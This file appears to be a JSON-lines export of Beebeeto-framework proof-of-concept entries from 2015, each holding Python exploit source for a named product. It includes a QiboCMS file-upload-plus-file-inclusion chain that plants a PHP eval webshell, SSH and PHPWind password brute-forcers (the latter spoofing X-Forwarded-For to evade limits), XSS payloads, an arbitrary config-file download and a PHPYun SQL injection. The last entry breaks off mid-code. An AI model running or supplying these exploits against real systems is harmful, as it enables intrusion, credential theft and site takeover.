+{"create_date": "2015-02-01 01:36:42", "name": "QiboCMS V5.0 /hr/listperson.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "WenR0", "rank": 5, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "Qibocms\u6f0f\u6d1e,Qibo getshell\u6f0f\u6d1e,/hr/listperson.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urlparse\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0024',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'QiboCMS V5.0 /hr/listperson.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC & Exploit',  # \u540d\u79f0\r\n            'author': 'WenR0',  # \u4f5c\u8005\r\n            'create_date': '2015-01-31',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Qibocms',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['v5.0'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'Local File Inclusion',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['Qibocms\u6f0f\u6d1e', 'Qibo getshell\u6f0f\u6d1e', '/hr/listperson.php', 'php'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'Qibocms /hr/listperson.php \u7cfb\u7edf\u6587\u4ef6\u5305\u542b\u81f4\u65e0\u9650\u5236Getshell',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2015-081470',  # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = 'FidTpl[list]=../images/default/default.js'\r\n        file_path = \"/hr/listperson.php?%s\" % payload\r\n        verify_url = args['options']['target'] + file_path\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        html = requests.get(verify_url).content\r\n        if 'var evt = (evt) ? evt : ((window.event) ? window.event : \"\");' in html:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            return args\r\n        return args\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        # \u4e0a\u4f20\u6587\u4ef6   upload file\r\n        upload_file_url = '%s/hy/choose_pic.php' % args['options']['target']\r\n        gif_file = {'postfile': ('test.gif', 'Gif89a <?php echo(md5(\"bb2\"));@eval($_POST[\"bb2\"]);', 'image/gif')}\r\n        gif_data = {'action': 'upload'}\r\n        upload_content = requests.post(upload_file_url, files=gif_file, data=gif_data).content\r\n        # \u83b7\u53d6\u6587\u4ef6\u7684\u5730\u5740   get file url\r\n        pic_reg = re.compile(r\"\"\"set_choooooooooooosed\\('\\d+','(.*)','.*'\\);\"\"\")\r\n        pic_file = pic_reg.findall(upload_content)\r\n        pic_file = urlparse.urlparse((pic_file[0])[:-4]).path\r\n        # \u6587\u4ef6\u5305\u542b is include?\r\n        file_path = \"/hr/listperson.php?FidTpl[list]=../%s\" % pic_file\r\n        webshell = '%s%s' % (args['options']['target'], file_path)\r\n        # \u9a8c\u8bc1\u662f\u5426\u6210\u529f  check\r\n        page_content = requests.get(webshell).content\r\n        if '0c72305dbeb0ed430b79ec9fc5fe8505' in page_content:\r\n            args['success'] = True\r\n            args['poc_ret']['webshell'] = webshell\r\n            args['poc_ret']['post_password'] = 'bb2'\r\n            return args\r\n        return args\r\n        \r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Qibocms /hr/listperson.php \u7cfb\u7edf\u6587\u4ef6\u5305\u542b\u81f4\u65e0\u9650\u5236Getshell", "app_name": "qibocms", "id": "poc-2015-0024", "layer4_protocol": null}
+{"create_date": "2015-01-29 19:06:02", "name": "SSH Brute (\u66b4\u529b\u7834\u89e3\u5bc6\u7801) POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 4, "port": null, "vul_type": "\u66b4\u529b\u7834\u89e3", "tag": "SSH\u66b4\u529b\u7834\u89e3\u5de5\u5177,SSH Brute,SSH\u5bc6\u7801\u7206\u7834", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urlparse\r\nimport paramiko\r\n\r\nimport SETTINGS\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0022',\r\n            'name': 'SSH Brute (\u66b4\u529b\u7834\u89e3\u5bc6\u7801) POC',\r\n            'author': '1024',\r\n            'create_date': '2015-01-29',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'ssh',\r\n            'port': [22],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'ssh',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['SSH\u66b4\u529b\u7834\u89e3\u5de5\u5177', 'SSH Brute', 'SSH\u5bc6\u7801\u7206\u7834'],\r\n            'desc': '\u52a0\u8f7d\u5b57\u5178\u66b4\u529b\u7834\u89e3SSH\u5bc6\u7801',\r\n            'references': ['http://www.beebeeto.com',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        if not url.startswith(('http://', 'https://')):\r\n            url = 'http://%s' % url\r\n        target = urlparse.urlparse(url).netloc\r\n        domain_user = target.split('.')[-2]\r\n        # Using Beebeeto-framework /utils password_list\r\n        password_list = open('%s/utils/payload/password_top100' % SETTINGS.FRAMEWORK_DIR)\r\n        user_list = ['root', 'test', 'admin', domain_user]\r\n        for pwd in password_list.readlines():\r\n            for user in user_list:\r\n                if args['options']['verbose']:\r\n                    print '[*] Content host: ' + target\r\n                    print '[+] User/Password: %s/%s' % (user, pwd)\r\n                client = paramiko.SSHClient()\r\n                client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n                try:\r\n                    client.connect(target, 22, username=user, password=pwd.strip(), timeout=8)\r\n                    stdin, stdout, stderr = client.exec_command('uname -a')\r\n                    args['success'] = True\r\n                    args['poc_ret']['ssh_target'] = target\r\n                    args['poc_ret']['ssh_user'] = user\r\n                    args['poc_ret']['ssh_passwd'] = pwd.strip()\r\n                    args['poc_ret']['ssh_uname'] = stdout.read()\r\n                    client.close()\r\n                    return args\r\n                except Exception, e:\r\n                    client.close()\r\n                    if str(e) == 'Authentication failed.':\r\n                        print '[-] Fail: %s\\n\\n' % e\r\n                        continue\r\n                    else:\r\n                        args['success'] = False\r\n                        args['exception'] = 'Failed to connect host/port.'\r\n                        return args\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u52a0\u8f7d\u5b57\u5178\u66b4\u529b\u7834\u89e3SSH\u5bc6\u7801", "app_name": "Linux", "id": "poc-2015-0022", "layer4_protocol": null}
+{"create_date": "2015-01-29 17:46:36", "name": "Exponent CMS 2.3.2 /exponent/index.php Reflected XSS Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u585e\u4e07\u94c1\u725b", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Exponent CMS\u6f0f\u6d1e,XSS\u6f0f\u6d1e,index.php?controller=search&src=,CVE-2015-1177", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0021',\r\n            'name': 'Exponent CMS 2.3.2 /exponent/index.php Reflected XSS Vulnerability POC',\r\n            'author': '\u585e\u4e07\u94c1\u725b',\r\n            'create_date': '2015-01-26',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Exponent CMS',\r\n            'vul_version': ['2.3.2'],\r\n            'type': 'Cross-Site Scripting',\r\n            'tag': ['Exponent CMS\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', 'index.php?controller=search&src=','CVE-2015-1177'],\r\n            'desc': 'N/A',\r\n            'references': ['http://www.securityfocus.com/bid/59887/',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/exponent/index.php?controller=search&src=f324e%22><script>alert(1)</script>9cbae6bf552&action=search&search_string=test&int=%0d'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<script>alert(1)</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n        \r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2015-0021", "layer4_protocol": null}
+{"create_date": "2015-01-28 14:14:37", "name": "QiboCMS V7 /do/job.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "xiao8bs", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Qibo\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/do/job.php,filedown,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {  \r\n          # poc\u76f8\u5173\u4fe1\u606f  \r\n          'poc': {  \r\n              'id': 'poc-2015-0020',\r\n              'name': 'QiboCMS V7 /do/job.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n              'author': 'xiao8bs',\r\n              'create_date': '2015-01-28',\r\n          },  \r\n          # \u534f\u8bae\u76f8\u5173\u4fe1\u606f  \r\n          'protocol': {  \r\n              'name': 'http',\r\n              'port': [80],\r\n              'layer4_protocol': ['tcp'],\r\n          },  \r\n          # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f  \r\n          'vul': {  \r\n              'app_name': 'Qibo',\r\n              'vul_version': ['V7',], \r\n              'type': 'Arbitrary File Download',\r\n              'tag': ['Qibo\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/do/job.php', 'filedown', 'php'],\r\n              'desc': 'Qibo V7 has File down in do/job.php.',\r\n              'references': ['N/A', \r\n              ],  \r\n          },  \r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = 'job=download&url=ZGF0YS9jb25maWcucGg8'\r\n        verify_url = args['options']['target'] + '/do/job.php?%s' % payload\r\n        request = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        response = urllib2.urlopen(request)\r\n        reg = re.compile(\"webdb\\['mymd5'\\]\")\r\n        if reg.findall(response.read()):\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        else:\r\n            args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n    \r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Qibo V7 has File down in do/job.php.", "app_name": "qibocms", "id": "poc-2015-0020", "layer4_protocol": null}
+{"create_date": "2015-01-25 21:49:15", "name": "PHPWIND v9.0 X-Forwarded-For IP\u9650\u5236\u7ed5\u8fc7\u5bfc\u81f4\u53ef\u88ab\u7206\u7834\u5bc6\u7801\u6f0f\u6d1e Exploit", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 4, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "PHPWIND IP\u9650\u5236\u7ed5\u8fc7\u6f0f\u6d1e,PHPWIND\u66b4\u529b\u7834\u89e3\u6f0f\u6d1e,X-Forwarded-For,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport random\r\nimport requests\r\nimport urlparse\r\n\r\nimport SETTINGS\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0017',\r\n            'name': 'PHPWIND V9.0 X-Forwarded-For IP\u9650\u5236\u7ed5\u8fc7\u5bfc\u81f4\u53ef\u88ab\u7206\u7834\u5bc6\u7801\u6f0f\u6d1e Exploit',\r\n            'author': 'user1018',\r\n            'create_date': '2015-01-24',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpwind',\r\n            'vul_version': ['9.0'],\r\n            'type': 'Other',\r\n            'tag': ['PHPWIND IP\u9650\u5236\u7ed5\u8fc7\u6f0f\u6d1e', 'PHPWIND\u66b4\u529b\u7834\u89e3\u6f0f\u6d1e', 'X-Forwarded-For', 'php'],\r\n            'desc': 'PHPWIND v9.0 /admin.php or /windid/admin.php IP\u4fee\u6539XFF\u7ed5\u8fc7\u767b\u5f55\u9650\u5236\u6f0f\u6d1e\u3002',\r\n            'references': ['N/A',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @staticmethod\r\n    def get_login_info(url, args):\r\n        \"\"\"\r\n        1. Obtain the url without verification code.\r\n        2. Obtain the csrf_token.\r\n        \"\"\"\r\n        try:\r\n            windid_ver_check, admin_ver_check = 1, 1 # Verification code\r\n            csrf_token_re = re.compile(r'<input type=\"hidden\" name=\"csrf_token\" value=\"(.*)\"/></form>')\r\n            windid_url = '%s/windid/admin.php' % url\r\n            windid_req = requests.get(windid_url)\r\n            windid_content = windid_req.content\r\n            if windid_req.status_code == 200:\r\n                if 'id=\"J_admin_name\" required name=\"username\"' in windid_content:\r\n                    if 'name=\"code\" placeholder=\"\u8bf7\u8f93\u5165\u9a8c\u8bc1\u7801\"' not in windid_content:\r\n                        windid_ver_check = 0\r\n                        try:\r\n                            csrf_token = csrf_token_re.findall(windid_content)[0]\r\n                        except:\r\n                            args['success'] = False\r\n                            return args\r\n                    else:\r\n                        windid_ver_check = 1\r\n\r\n            admin_url = '%s/admin.php' % url\r\n            admin_req = requests.get(admin_url)\r\n            admin_content = admin_req.content\r\n            if admin_req.status_code == 200:\r\n                if 'id=\"J_admin_name\" required name=\"username\"' in admin_content:\r\n                    if 'name=\"code\" placeholder=\"\u8bf7\u8f93\u5165\u9a8c\u8bc1\u7801\"' not in admin_content:\r\n                        admin_ver_check = 0\r\n                        try:\r\n                            csrf_token = csrf_token_re.findall(admin_content)[0]\r\n                        except:\r\n                            args['success'] = False\r\n                            return args\r\n                    else:\r\n                        admin_ver_check = 1\r\n        except:\r\n            args['success'] = False\r\n            return args\r\n\r\n        if windid_ver_check == 0:\r\n            return windid_url, csrf_token\r\n        elif admin_ver_check == 0:\r\n            return admin_url, csrf_token\r\n        return None, None\r\n\r\n\r\n    @staticmethod\r\n    def get_username(url, args):\r\n        verify_url = '%s/index.php?m=space&uid=1' % url\r\n        homepage = requests.get(verify_url).content\r\n        user_re = re.compile(r'class=\"message J_qlogin_trigger J_send_msg_pop\" data-name=\"(.*)\"><em></em>')\r\n        try:\r\n            username = user_re.findall(homepage)[0]\r\n        except:\r\n            username = 'admin'\r\n        return username\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        password_list = open('%s/utils/payload/password_top1000' % SETTINGS.FRAMEWORK_DIR, 'r')\r\n        for pwd in password_list.readlines():\r\n            url = args['options']['target']\r\n            ver_url, csrf_token  = cls.get_login_info(url, args)\r\n            ip = str(random.randint(1,244))+\".\"+str(random.randint(100,244))+\".\"+str(random.randint(100,244))+\".\"+str(random.randint(100,244))\r\n            headers_fake = {\"Host\": urlparse.urlparse(url).netloc,\r\n                            \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\",\r\n                            \"X-Forwarded-For\": ip,\r\n                            'Content-Type': 'application/x-www-form-urlencoded',\r\n                            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n                            'Connection': 'keep-alive'}\r\n\r\n            if ver_url and csrf_token:\r\n                # Obtain username\r\n                username = cls.get_username(url, args)\r\n                # Brute func\r\n                headers_fake['Cookie'] = 'csrf_token=%s' % csrf_token\r\n                payload = 'username=%s&password=%s&submit=&csrf_token=%s' % (username, pwd.split()[0], csrf_token)\r\n                if args['options']['verbose']:\r\n                    print '[*] POST Username: %s' % username\r\n                    print '[*] POST Password: %s' % pwd.split()[0]\r\n                    print '[*] POST Payload: %s\\n' % payload\r\n                try:\r\n                    req_content = requests.post('%s?a=login'%ver_url, data=payload, headers=headers_fake).content\r\n                except:\r\n                    continue\r\n                if 'admin.php?a=logout\" class=' in req_content:\r\n                    args['success'] = True\r\n                    args['poc_ret']['login_url'] = ver_url\r\n                    args['poc_ret']['username'] = username\r\n                    args['poc_ret']['password'] = pwd.split()[0]\r\n                    return args\r\n            else:\r\n                args['success'] = False\r\n                return args\r\n        return args\r\n\r\n\r\n    verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "PHPWIND v9.0 /admin.php or /windid/admin.php IP\u4fee\u6539XFF\u7ed5\u8fc7\u767b\u5f55\u9650\u5236\u6f0f\u6d1e\u3002", "app_name": "PHPWind", "id": "poc-2015-0017", "layer4_protocol": null}
+{"create_date": "2015-01-20 11:32:40", "name": "Elasticsearch 9200\u7aef\u53e3 \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Elasticsearch\u6f0f\u6d1e,\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0014',\r\n            'name': 'Elasticsearch 9200\u7aef\u53e3 \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2015-01-20',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [9200],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Elasticsearch',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Elasticsearch\u6f0f\u6d1e', '\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e'],\r\n            'desc': '\u9ed8\u8ba4\u60c5\u51b5\uff0cElasticsearch\u5f00\u542f\u540e\u4f1a\u76d1\u542c9200\u7aef\u53e3\u53ef\u4ee5\u5728\u672a\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u8bbf\u95ee\uff0c\u4ece\u800c\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f',\r\n            'references': ['',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        target = urlparse.urlparse(args['options']['target'])\r\n        verify_url = '%s://%s:9200/_nodes/stats' % (target.scheme, target.netloc)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        try:\r\n            content = requests.get(verify_url, timeout=5).text\r\n        except:\r\n            content = ''\r\n        if 'cluster_name' in content and 'transport_address\":' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u9ed8\u8ba4\u60c5\u51b5\uff0cElasticsearch\u5f00\u542f\u540e\u4f1a\u76d1\u542c9200\u7aef\u53e3\u53ef\u4ee5\u5728\u672a\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u8bbf\u95ee\uff0c\u4ece\u800c\u5bfc\u81f4\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f", "app_name": "ElasticSearch", "id": "poc-2015-0014", "layer4_protocol": null}
+{"create_date": "2015-01-16 22:48:36", "name": "PHPYun 3.1 /wap/member/model/index.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "PHPYun\u6f0f\u6d1e,/wap/member/model/index.class.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.forgeheaders import ForgeHeaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0012',\r\n            'name': 'PHPYun 3.1 /wap/member/model/index.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2015-01-16',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'PHPYun',\r\n            'vul_version': ['3.1'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['PHPYun\u6f0f\u6d1e', '/wap/member/model/index.class.php', 'php'],\r\n            'desc': '/wap/member/model/index.class.php \u8fc7\u6ee4\u4e0d\u4e25\u8c28',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-071296',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        fake_headers = ForgeHeaders().get_headers()\r\n        fake_headers['User-Agent'] = \"iPhone6\"\r\n        check_url = '%s/index.php?m=resume&id=999999' % args['options']['target']\r\n        verify_url = '%s/wap/member/index.php?m=index&c=saveresume' % args['options']['target']\r\n        data = 'table=expect%60%20%28id%2Cuid%2Cname%29%20values%20%28' \\\r\n               '999999%2C1%2C%28md5%280x23333333%29%29%29%23&subm' \\\r\n               'it=111&eid=1'\r\n        req = urllib2.Request(verify_url, data=data, headers=fake_headers)\r\n        urllib2.urlopen(req)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(check_url).read()\r\n        if '2eb120797101bb291fd4a6764' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            args['poc_ret']['post_data'] = data\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "/wap/member/model/index.class.php \u8fc7\u6ee4\u4e0d\u4e25\u8c28", "app_name": "phpyun", "id": "poc-2015-0012", "layer4_protocol": null}
+{"create_date": "2015-01-16 11:50:01", "name": "Wordpress Plugin Pods <= 2.4.3 XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u585e\u4e07\u94c1\u725b", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Wordpress\u6f0f\u6d1e,Pods plugin\u6f0f\u6d1e,/wp-admin/admin.php,php,CVE-2014-7956", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0010',\r\n            'name': 'Wordpress Plugin Pods <= 2.4.3 XSS\u6f0f\u6d1e POC',\r\n            'author': '\u585e\u4e07\u94c1\u725b',\r\n            'create_date': '2015-01-16',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Wordpress with Pods plugin',\r\n            'vul_version': ['<=2.4.3'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Wordpress\u6f0f\u6d1e', 'Pods plugin\u6f0f\u6d1e', '/wp-admin/admin.php', 'php', 'CVE-2014-7956'],\r\n            'desc': '''\r\n                    Wordpress:\u5c0f\u4e8e2.4\u7248\u672c\u7684Pods\u63d2\u4ef6\u4e2d<a>\u6807\u8bb0\u672a\u95ed\u5408\uff0c\u5bfc\u81f4HTTP GET\u53c2\u6570\u6570\u636e\u4e2d\uff0c\u53ef\u4ee5\u4ea7\u751f\u53cd\u5c04\u578b\u7684xss\u6f0f\u6d1e\u3002\r\n                    ''',\r\n            'references': ['http://www.securityfocus.com/archive/1/534437',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/wp-admin/admin.php?page=pods&action=edit&id=4\"></a><script>alert(1)</script><!--'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<script>alert(1)</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    